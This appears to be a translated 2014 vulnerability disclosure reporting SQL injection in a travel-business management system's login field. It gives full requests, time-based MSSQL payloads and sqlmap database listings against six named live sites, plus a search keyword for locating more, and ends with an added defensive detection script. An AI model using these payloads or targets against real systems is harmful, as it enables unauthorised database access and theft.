
Vulnerability summary

Defect ID: wooyun-2014-077311

Title: A business management system has a generic SQL injection vulnerability

Related vendor: 苏州赛思科技有限公司

Author: Mr.leo

Submitted: 2014-09-25 17:57

Fix time: 2014-12-24 17:58

Public disclosure time: 2014-12-24 17:58

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help please contact [email protected]


Vulnerability details

Disclosure status:

2014-09-25: Details reported to the vendor; awaiting vendor handling
2014-09-29: Vendor confirmed; details disclosed to the vendor only
2014-10-02: Details opened to third-party security partners
2014-11-23: Details disclosed to core white hats and experts in the relevant field
2014-12-03: Details disclosed to regular white hats
2014-12-13: Details disclosed to intern white hats
2014-12-24: Details disclosed to the public

Brief description:

BOOM!!!

Detailed description:

The 星联盟综合业务管理系统 (Star Alliance Integrated Business Management System) developed by 苏州赛思科技有限公司.
Company case studies: http://www.sz-ss.net/Advantage/anlizhanshi/
Baidu search keyword: 星联盟综合业务管理系统用户登录
http://www.999star.com/ : the 星联盟 system runs 10 sub-systems in total:
安徽事达航空国际旅行社有限公司 (hf.999star.com)
长沙事达国际旅行社有限公司 (cs.999star.com)
供应商订单签收系统 (gys.999star.com)
海南万悦旅行社有限公司南京分公司 (nj.999star.com)
海南事达国际旅行社有限公司上海分公司 (sh.999star.com)
海南凤凰假期(西安) (xa.999star.com)
江西牵手旅行社有限公司 (jx.999star.com)
太原海新之旅旅行社有限公司 (ty.999star.com)
武汉新华国际旅行社有限公司 (wh.999star.com)
徐州吉祥国际旅行社有限公司 (xz.999star.com)
The system's txtID parameter is injectable.
Six cases as proof:
1. http://www.sciencesoft.com.cn/Login.aspx
POST /Login.aspx?ReturnUrl=/UI HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.sciencesoft.com.cn/Login.aspx
Content-Length: 119
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Host: www.sciencesoft.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
btnLogin=edqbdbmr&txtID=1&txtPwd=1&__VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE%2bLjfk0vNHuZ9o6/u4G05gw0yP0aHBg0%3d
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtID
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: btnLogin=edqbdbmr&txtID=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&__VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G05gw0yP0aHBg0=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: btnLogin=edqbdbmr&txtID=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&__VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G05gw0yP0aHBg0=
---
[14:42:46] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [16]:
[*] 33LY_DEMOA
[*] 5HouyeDB
[*] [model!]
[*] [PLAS\x03]
[*] [SDLY\x02]
[*] [Tourism\x05]
[*] [WJDC\x05]
[*] CsLand
[*] mastqr
[*] msdb
[*] QYTX
[*] SNDHRaA
[*] SZDD
[*] tempdq
[*] testbase
[*] TZJKOAA
2. http://999star.com/Login.aspx
POST /Login.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://999star.com/Login.aspx
Content-Length: 119
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Host: 999star.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
btnLogin=wgddapbf&txtID=1&txtPwd=1&__VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE%2bLjfk0vNHuZ9o6/u4G05gw0yP0aHBg0%3d
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtID
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: btnLogin=wgddapbf&txtID=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&__VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G05gw0yP0aHBg0=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: btnLogin=wgddapbf&txtID=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&__VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G05gw0yP0aHBg0=
---
[14:59:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[14:59:30] [INFO] fetching database names
[14:59:30] [INFO] fetching number of databases
[14:59:30] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[15:00:20] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
1
[15:01:03] [INFO] adjusting time delay to 3 seconds due to good response times
6
[15:01:29] [INFO] retrieved: 33LY_DEMO
[15:09:06] [INFO] retrieved:
[16:43:00] [INFO] retrieved: WJDC
available databases [16]:
[*] 33LY_DEMO
[*] [5HouseDB\x11]
[*] [QYTX!]
[*] CsLand
[*] master
[*] modgl
[*] msdb
[*] PLAS
[*] SDLY
[*] SNDHROA
[*] SZDD
[*] testbase
[*] tgmpdb
[*] Tourism
[*] TZJKOA
[*] WJDC
3. http://www.360ly.com/Login.aspx?ReturnUrl=%2f
POST http://www.360ly.com/Login.aspx?ReturnUrl=%2f HTTP/1.1
Host: www.360ly.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.360ly.com/Login.aspx?ReturnUrl=%2f
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
__VIEWSTATE=%2FwEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE%2BLjfk0vNHuZ9o6%2Fu4G05gw0yP0aHBg0%3D&txtID=1&txtPwd=2&btnLogin=
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtID
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G05gw0yP0aHBg0=&txtID=1'; WAITFOR DELAY '0:0:5';--&txtPwd=2&btnLogin=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G05gw0yP0aHBg0=&txtID=1' WAITFOR DELAY '0:0:5'--&txtPwd=2&btnLogin=
---
[14:59:36] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[14:59:36] [INFO] fetching database names
[14:59:36] [INFO] fetching number of databases
[14:59:36] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[15:00:26] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[16:31:28] [INFO] retrieved: TZJKOA
[16:37:57] [INFO] retrieved: WJDC
available databases [16]:
[*] 33LY_DEMO
[*] 5HouseDB
[*] [msdb\x0b]
[*] [PLAS\x05]
[*] CsLand
[*] master
[*] model
[*] QYTX
[*] SDLY
[*] SNDHROA
[*] SZDD
[*] tempdb
[*] testbase
[*] Tourism
[*] TZJKOA
[*] WJDC
4. http://xa.999star.com/Login.aspx?ReturnUrl=%2f
POST http://xa.999star.com/Login.aspx?ReturnUrl=%2f HTTP/1.1
Host: xa.999star.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://xa.999star.com/Login.aspx?ReturnUrl=%2f
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
__VIEWSTATE=%2FwEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE%2BLjfk0vNHuZ9o6%2Fu4G05gw0yP0aHBg0%3D&txtID=1&txtPwd=2&btnLogin=
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtID
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G05gw0yP0aHBg0=&txtID=1'; WAITFOR DELAY '0:0:5';--&txtPwd=2&btnLogin=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G05gw0yP0aHBg0=&txtID=1' WAITFOR DELAY '0:0:5'--&txtPwd=2&btnLogin=
---
[14:59:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[14:59:43] [INFO] fetching database names
[14:59:43] [INFO] fetching number of databases
[14:59:43] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[15:00:33] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
1
TZJKOA
[16:48:49] [INFO] retrieved: WJDC!
available databases [16]:
[*] 33LY_DEMO
[*] 5HouseDB
[*] [tempdb!\tC]
[*] [WJDC!]
[*] CsLand
[*] master
[*] model
[*] msdb
[*] PLAS
[*] QYTX
[*] SDLY
[*] SNDHROA
[*] SZDD
[*] testbase
[*] Tourism
[*] TZJKOA
5. http://jianyin.5house.net/Login.aspx?ReturnUrl=%2f
POST http://jianyin.5house.net/Login.aspx?ReturnUrl=%2f HTTP/1.1
Host: jianyin.5house.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://jianyin.5house.net/Login.aspx?ReturnUrl=%2f
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
__VIEWSTATE=%2FwEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE%2BLjfk0vNHuZ9o6%2Fu4G05gw0yP0aHBg0%3D&txtID=1&txtPwd=2&btnLogin=
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtID
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G05gw0yP0aHBg0=&txtID=1'; WAITFOR DELAY '0:0:5';--&txtPwd=2&btnLogin=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G05gw0yP0aHBg0=&txtID=1' WAITFOR DELAY '0:0:5'--&txtPwd=2&btnLogin=
---
[15:02:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:02:31] [INFO] fetching database names
[15:02:31] [INFO] fetching number of databases
[15:02:31] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[15:03:21] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
1
[15:04:04] [INFO] adjusting time delay to 3 seconds due to good response times
6
[15:04:30] [INFO] retrieved: 33LY_DEMO
[15:12:09] [INFO] retrieved: 5Ho
available databases [16]:
[*] 33LY_DEMO
[*] 5HouseDB
[*] [SDLY\x02\x02!]
[*] [tempdb\t]
[*] [testkase\t]
[*] CsLand
[*] master
[*] model
[*] msdb
[*] PLAS
[*] QYTX
[*] SNDIROA
[*] SZDD
[*] Tourism
[*] TZJKOA
[*] WJDC
6. http://hf.999star.com/Login.aspx?ReturnUrl=%2f
POST http://hf.999star.com/Login.aspx?ReturnUrl=%2f HTTP/1.1
Host: hf.999star.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://hf.999star.com/Login.aspx?ReturnUrl=%2f
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
__VIEWSTATE=%2FwEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE%2BLjfk0vNHuZ9o6%2Fu4G05gw0yP0aHBg0%3D&txtID=1&txtPwd=2&btnLogin=
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtID
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G05gw0yP0aHBg0=&txtID=1'; WAITFOR DELAY '0:0:5';--&txtPwd=2&btnLogin=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G05gw0yP0aHBg0=&txtID=1' WAITFOR DELAY '0:0:5'--&txtPwd=2&btnLogin=
---
[15:12:46] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:12:46] [INFO] fetching database names
[15:12:46] [INFO] fetching number of databases
[15:12:46] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[15:13:36] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
1
[15:14:19] [INFO] adjusting time delay to 3 seconds due to good response times
6
[15:14:45] [INFO] retrieved:
[16:44:39] [INFO] retrieved: Tourism
[16:51:53] [INFO] retrieved: TZJKOA
[16:57:43] [INFO] retrieved: WJDC
available databases [16]:
[*] 33LY_DEMO
[*] 5HouseDB
[*] CsLandA
[*] master
[*] modem
[*] msdb
[*] PLAS
[*] QYTX
[*] SDLY
[*] SNDHROA
[*] SZDD
[*] testbase
[*] tgmpdb
[*] Tourism
[*] TZJKOA
[*] WJDC

Proof of vulnerability:

Proven above.

Remediation:

Filter the parameters.
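As an added example (not code from the report or from the vendor's product), defender-side detection logic in Python that URL-decodes a Login.aspx POST body and flags txtID/txtPwd values matching the MSSQL time-delay and stacked-query shapes seen in the sqlmap output above; the sample bodies and the shortened __VIEWSTATE value are constructed.

```python
import re
from urllib.parse import parse_qs

# Constructed sample Login.aspx POST bodies (__VIEWSTATE is a short stand-in):
# [0] the benign probe from the report, [1] the stacked-query shape,
# [2] the time-based blind shape, [3] an ordinary login attempt.
SAMPLE_BODIES = [
    "btnLogin=edqbdbmr&txtID=1&txtPwd=1&__VIEWSTATE=AAA%3d",
    "btnLogin=edqbdbmr&txtID=1%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3B--"
    "&txtPwd=1&__VIEWSTATE=AAA%3d",
    "__VIEWSTATE=AAA%3D&txtID=1%27+WAITFOR+DELAY+%270%3A0%3A5%27--&txtPwd=2&btnLogin=",
    "txtID=zhangsan&txtPwd=secret&btnLogin=",
]

# Shapes characteristic of the MSSQL probes in the report, checked
# case-insensitively against the URL-decoded field value.
PATTERNS = {
    "mssql_time_delay": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "stacked_query": re.compile(
        r";\s*(WAITFOR|EXEC|DECLARE|SELECT|INSERT|UPDATE|DELETE|DROP)\b", re.I),
    "quote_then_comment": re.compile(r"'.*--"),
}

# Login form fields from the report's requests; txtID is the one shown injectable.
WATCHED_FIELDS = ("txtID", "txtPwd")


def inspect_login_body(body: str) -> dict:
    """Return {field: [pattern labels]} for each watched field whose decoded
    value matches an injection shape; an empty dict means nothing flagged."""
    fields = parse_qs(body, keep_blank_values=True)
    findings = {}
    for name in WATCHED_FIELDS:
        for value in fields.get(name, []):
            hits = [label for label, rx in PATTERNS.items() if rx.search(value)]
            if hits:
                findings.setdefault(name, []).extend(hits)
    return findings


def scan_bodies(bodies) -> dict:
    """Map the index of every flagged body to its findings."""
    results = {}
    for i, body in enumerate(bodies):
        findings = inspect_login_body(body)
        if findings:
            results[i] = findings
    return results


if __name__ == "__main__":
    for i, findings in scan_bodies(SAMPLE_BODIES).items():
        print(f"body {i}: {findings}")
```

Pattern matching like this belongs in monitoring; the fix itself is to pass txtID to SQL Server as a bound parameter rather than concatenating it into the query text.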

Copyright notice: when reposting, please credit the source: Mr.leo@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 14

Confirmed: 2014-09-29 09:59

Vendor reply:

Latest status:

None yet